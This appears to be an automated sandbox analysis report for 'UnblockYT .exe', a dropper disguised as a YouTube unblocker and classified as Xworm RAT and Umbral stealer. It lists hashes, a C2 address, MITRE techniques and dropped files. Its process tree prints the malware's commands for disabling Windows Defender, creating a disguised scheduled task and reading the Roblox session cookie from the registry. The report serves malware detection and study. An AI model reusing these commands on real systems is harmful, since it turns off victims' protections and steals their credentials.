Overview

overview

10

Static

static

3

UnblоckYT .exe

windows7-x64

1

UnblоckYT .exe

windows10-2004-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    295s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-08-2024 09:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    UnblоckYT .exe

  • Size

    2.2MB

  • MD5

    83bac78ee6a4de7070e73ed20f683b04

  • SHA1

    6fd261a71a20ac9fe3661dee5daf2101f034e282

  • SHA256

    24fd45824aa18ef1766dfd9b2a6e6fd4d46b956be84b243f5904075a7fdb3535

  • SHA512

    cc535de97e30e9ecf28f0ca51a17e8a12d91b98ecd3f99fb7218b4059d69ce8b9dea387938ffc40e018629c6fa78244c1972cf29c36526e85d7fde50a8c2dbae

  • SSDEEP

    49152:1Djlabwz9f38XpWxKyNCNWakvy/+adWUKNwljT+Pb3Qz:Zqw1OWxK6WWakvy35KEoi

Score
10/10
umbralxwormcredential_accessdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

connection-arizona.gl.at.ply.gg:65211

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 6 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 10 IoCs
    evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe
    "C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe"
    1⤵
      PID:4340
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:5072
      • C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe
        "C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe"
        1⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:680
        • C:\Users\Admin\AppData\Roaming\UnblоckYT .exe
          "C:\Users\Admin\AppData\Roaming\UnblоckYT .exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1804
          • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
            "C:\Users\Admin\AppData\Roaming\UnblockYT .exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3436
            • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
              "C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:208
              • C:\Users\Admin\AppData\Roaming\YTunblock.exe
                "C:\Users\Admin\AppData\Roaming\YTunblock.exe"
                5⤵
                • Checks computer location settings
                • Drops startup file
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4972
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\YTunblock.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3464
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YTunblock.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4700
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3332
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2696
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2816
                • C:\Users\Admin\AppData\Local\Temp\xitwtr.exe
                  "C:\Users\Admin\AppData\Local\Temp\xitwtr.exe"
                  6⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3812
                  • C:\Windows\SYSTEM32\attrib.exe
                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\xitwtr.exe"
                    7⤵
                    • Views/modifies file attributes
                    PID:2960
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\xitwtr.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4812
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3380
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4584
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:456
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" os get Caption
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1988
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" computersystem get totalphysicalmemory
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3556
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" csproduct get uuid
                    7⤵
                      PID:2252
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:4948
                    • C:\Windows\System32\Wbem\wmic.exe
                      "wmic" path win32_VideoController get name
                      7⤵
                      • Detects videocard installed
                      PID:4152
                    • C:\Windows\SYSTEM32\cmd.exe
                      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\xitwtr.exe" && pause
                      7⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      PID:2888
                      • C:\Windows\system32\PING.EXE
                        ping localhost
                        8⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:228
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\ .bat" "
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4392
                • C:\Windows\system32\timeout.exe
                  timeout /t 1 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:3036
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:5012
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:3504
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:880
                • C:\Windows\system32\timeout.exe
                  timeout /t 1 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:2872
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4068
                • C:\Windows\system32\timeout.exe
                  timeout /t 1 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4132
                • C:\Windows\system32\timeout.exe
                  timeout /t 3 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4388
                • C:\Windows\system32\timeout.exe
                  timeout /t 3 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:1452
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:3664
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /4
          1⤵
          • Checks SCSI registry key(s)
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3576
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2660
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2960

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Defense Evasion

        Hide Artifacts

        1
        T1564

        Hidden Files and Directories

        1
        T1564.001

        Modify Registry

        1
        T1112

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Peripheral Device Discovery

        1
        T1120

        Query Registry

        2
        T1012

        Remote System Discovery

        1
        T1018

        System Information Discovery

        4
        T1082

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Web Service

        1
        T1102

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
          Filesize

          522B

          MD5

          8334a471a4b492ece225b471b8ad2fc8

          SHA1

          1cb24640f32d23e8f7800bd0511b7b9c3011d992

          SHA256

          5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169

          SHA512

          56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          da0e645754bee5dea8e82cdf88364bfe

          SHA1

          4a92598fb8706a7fdf6d9343704a173807087191

          SHA256

          73a97752534c0ee8b655712e05c4c53127dbcefcf769838b464ce46de7e24068

          SHA512

          c3bfd5fd716888ca04390bdfd34e2a4aa08329bdf0f1c1c65a94dc0a53cfb2c7ea9d2b31cc6863189ca0cc74794dbce5035ad867e171f5051d25b6a87d23e3cb

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          b26ac95363638555ce516e5fd892fd67

          SHA1

          e21c3b09f115383e24c03c2db875c120d8977878

          SHA256

          73b2bd3120d9afade9a02ed07abc960dda68d4cb06319466057302286cf29f95

          SHA512

          b4ef740ecc2c924709f792face4c0215a8d90a89288cee22f087a79a8dd9773af4b2ccfb71ea6cbff6fa5ad919dfbeebbde033d01eb4ddc07b233ea6f7bc2939

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          177dcaab989d9ccaa3d2beff26022dfc

          SHA1

          f95539ce14b0ce5b06225ed2435a3f54885eda03

          SHA256

          8712c6c7188c8b392cbf74187fca562296f9aea56c06447c9e3d79bf2374bc4f

          SHA512

          117229fa8327abb9ef77a95800b8e9e00a5d3e410a8324b2acb7e245f500f6b232448fa54249798add7e3d97f07023ac999f42a006c80a246208fa4a66be15c5

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          3a78acc4ee6e2ac1cb13574f9fc32639

          SHA1

          b7a2eada56461d883d21ec98407f90d5caa03d8c

          SHA256

          ae3951cef55032551c84974ad25ca50e6bc29ac562dfad5b22d6808cd632da6d

          SHA512

          d3d569b10efbb1d7c3aafe2e9c30e5c65a4dc8e98f500fac66ba2cfba5d52bc8791f3332f580f83f75c88672e0a99d2494177b6ddb0867ca997de50b39eddc18

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          9b80cd7a712469a4c45fec564313d9eb

          SHA1

          6125c01bc10d204ca36ad1110afe714678655f2d

          SHA256

          5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

          SHA512

          ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          948B

          MD5

          985b3105d8889886d6fd953575c54e08

          SHA1

          0f9a041240a344d82bac0a180520e7982c15f3cd

          SHA256

          5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

          SHA512

          0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          276798eeb29a49dc6e199768bc9c2e71

          SHA1

          5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

          SHA256

          cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

          SHA512

          0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          79f6952813009f51247491052ca9ebbb

          SHA1

          78210dbe806bcde87a5f00201c9068bc1737a9ca

          SHA256

          bee2da5d5a697d09df4aa2b1c374a083a49b4f319c11da53c43ce9520b72a5dd

          SHA512

          cd019d3dc84665413a23cb2f4ed8fbe6bd6673928144d7af31e70d46dc24ce876bd5ffb11cb65fd5532f8f00bd793dd883200069b06dc93becf5d1db0399c22b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hve4toep.ktv.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\xitwtr.exe
          Filesize

          229KB

          MD5

          fed4a7197948ba327337b612254a673b

          SHA1

          2d1a9070dac7754ec592768654574fb933ec3730

          SHA256

          2f8e20e2e7712f7d896fe4fcbcb30161ef7abfc75b88584fc199c9203315efc7

          SHA512

          51bc82d032cee6689d62c98a5ce848297f8d55ecc03a4d506371db278abf418354294e9d5469d38be97fa41adb4d77932401dc0719eea33fb75c162fd0f32cff

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
          Filesize

          771B

          MD5

          2550399ce21282e2907bb02ec1a805cb

          SHA1

          c217c3c4e269f601800144dc4a8930e3ad338d54

          SHA256

          a6a5e41524327518ee0be6f11c5c7e2d43ccb01130d3bf476bce928e04871f5f

          SHA512

          28555006184873af09abf0c143c56b4fa0f709491a3313be647771bcda5e15525382e6e445217dd4faeb9ece1780844f62e3cbf01a36cd390b3ff8e049fa3f70

          Download Submit

        • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
          Filesize

          1.8MB

          MD5

          ddf02dfa6df9ee4e157d675e55a055c7

          SHA1

          d6fc1b85378c9ffae39dfaa0fc3a6876193ce933

          SHA256

          6ec4b872cd4c8aa6859574fb02187bda31fb71cbace5026c9e0d89e078b61730

          SHA512

          79b32c992e1adea1700fac6e87fe1dac0562fc6ff927f16b7464fa32793ff41cc9c1ad9caf323a87213f0cda7c32d29e155e1a5eed8f18d09819d13515b1a4a0

          Download Submit

        • C:\Users\Admin\AppData\Roaming\UnblоckYT .exe
          Filesize

          2.0MB

          MD5

          9507d39a1268cc9bc49a89a5b6b1efde

          SHA1

          62919a92df361ec9f797066b8fd025d7e07c2795

          SHA256

          d815fcc722bee4f1025644dce314ce8c0b41d05491fd1e3c382a3b403564075f

          SHA512

          ffd75d68a7e8025c11922681b3214a8c96d70f7fd30f6eb7f6429e3865113f5406cc33ac76cd1580c03b64a52ff846c2c6e8d75968876ab7ac0625dd4873bbc0

          Download Submit

        • C:\Users\Admin\AppData\Roaming\YTunblock.exe
          Filesize

          1.2MB

          MD5

          5c130e0ea8b936a34372663dd763f722

          SHA1

          cbb1efd33b28851682ae3f9699c79ffe705c780d

          SHA256

          262edf6e52c54494f19dd41c37307c6fb85bbd37820fb10df68a01f2f2fef644

          SHA512

          a4e7bc8a551507648651740ce87388929ab9c7c3c4997ba0c1fb15116a6e433e1660f11a65886b0ed7552264df74ce055a84fad4c96a057fb0b4c4c37b149f2e

          Download Submit

        • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
          Filesize

          1.6MB

          MD5

          10aefe8560bf4e437d2f47bd469a59ff

          SHA1

          57c72df8758b6afcaa47d3dd9b46009b0d68f7e5

          SHA256

          56a5db69837d84f160c2ad3fd7c46ab658df9979d3ba34834a8b514e63626f11

          SHA512

          d8f6fd44f11b140c36bfa1d9d732f31d5bc308887fcce3605391ce30fa2fa360379d5c47e7ea2bb9ef5d7dea5b8f82bdd0d7e643a7d7d9de37b478ac7f43646d

          Download Submit

        • C:\Users\Admin\AppData\Roaming\ .bat
          Filesize

          1KB

          MD5

          5807f01368bda72ebd943e8755fa2e0c

          SHA1

          f42940149bf0e256b14343c87f750c6cdac8ae72

          SHA256

          9c7be36ede7526e5d10e8af969dbf8d2b242ab9c52c107e9f42200fb0ee2ce2a

          SHA512

          31612135b0981a500b8b09c72809da0e66e0633885270aeb26de02c26dbdbb4d8b27299349cc352558a3c9ec18eda6840e380ca99473fde3882cbbe3e02dc107

          Download Submit

        • memory/2660-186-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/2660-181-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/2660-182-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/2660-183-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/2696-156-0x000000006F580000-0x000000006F5CC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2960-295-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/2960-297-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/2960-293-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/3332-135-0x000000006F580000-0x000000006F5CC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/3464-97-0x0000000007AF0000-0x0000000007B0A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/3464-74-0x0000000005E30000-0x0000000006184000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/3464-89-0x0000000007470000-0x0000000007513000-memory.dmp

          Filesize

          652KB

          Download

        • memory/3464-90-0x0000000007DF0000-0x000000000846A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/3464-91-0x00000000077B0000-0x00000000077CA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/3464-92-0x0000000007820000-0x000000000782A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/3464-93-0x0000000007A30000-0x0000000007AC6000-memory.dmp

          Filesize

          600KB

          Download

        • memory/3464-94-0x00000000079B0000-0x00000000079C1000-memory.dmp

          Filesize

          68KB

          Download

        • memory/3464-95-0x00000000079E0000-0x00000000079EE000-memory.dmp

          Filesize

          56KB

          Download

        • memory/3464-96-0x00000000079F0000-0x0000000007A04000-memory.dmp

          Filesize

          80KB

          Download

        • memory/3464-78-0x000000006F580000-0x000000006F5CC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/3464-98-0x0000000007AD0000-0x0000000007AD8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/3464-77-0x0000000006A50000-0x0000000006A82000-memory.dmp

          Filesize

          200KB

          Download

        • memory/3464-48-0x0000000002B90000-0x0000000002BC6000-memory.dmp

          Filesize

          216KB

          Download

        • memory/3464-76-0x0000000006520000-0x000000000656C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/3464-49-0x0000000005660000-0x0000000005C88000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/3464-75-0x0000000006480000-0x000000000649E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/3464-50-0x00000000053B0000-0x00000000053D2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3464-51-0x0000000005550000-0x00000000055B6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/3464-88-0x0000000007440000-0x000000000745E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/3576-54-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3576-67-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3576-70-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3576-68-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3576-69-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3576-71-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3576-72-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3576-53-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3576-73-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3576-52-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3812-272-0x0000020A23530000-0x0000020A23542000-memory.dmp

          Filesize

          72KB

          Download

        • memory/3812-204-0x0000020A09080000-0x0000020A090C0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/3812-234-0x0000020A238C0000-0x0000020A238DE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/3812-271-0x0000020A234F0000-0x0000020A234FA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/3812-231-0x0000020A237A0000-0x0000020A23816000-memory.dmp

          Filesize

          472KB

          Download

        • memory/3812-233-0x0000020A23820000-0x0000020A23870000-memory.dmp

          Filesize

          320KB

          Download

        • memory/4700-113-0x000000006F580000-0x000000006F5CC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/4700-105-0x0000000005BD0000-0x0000000005F24000-memory.dmp

          Filesize

